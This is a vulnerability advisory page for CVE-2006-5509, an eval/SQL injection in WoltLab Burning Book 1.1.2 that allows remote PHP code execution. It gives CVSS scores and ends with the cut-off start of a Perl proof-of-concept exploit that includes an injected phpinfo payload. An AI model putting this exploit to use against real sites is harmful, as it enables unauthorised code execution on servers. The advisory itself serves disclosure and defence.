7.5
CVSSv2

CVE-2006-5509

Published: 25/10/2006 Updated: 17/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Eval injection vulnerability in addentry.php in WoltLab Burning Book 1.1.2 allows remote malicious users to execute arbitrary PHP code via crafted POST requests that store PHP code in a database that is later processed by eval, as demonstrated using SQL injection via the n parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

woltlab burning book 1.1.2

Exploits

#!/usr/bin/perl # woltlabde burning book <=112 SQL and PHP injection PoC # use /indexphp?q=phpinfo();exit; # ShAnKaR sec[A]shankarantichatru # antichatru/ use LWP; die("use /burn-bookpl localhost/wbbook/ [1(number book db, default `1`)]\n") if !$ARGV[0];$ARGV[1]='' if !$ARGV[1]; my $ua=LWP::UserAgent->new(); $ua->p ...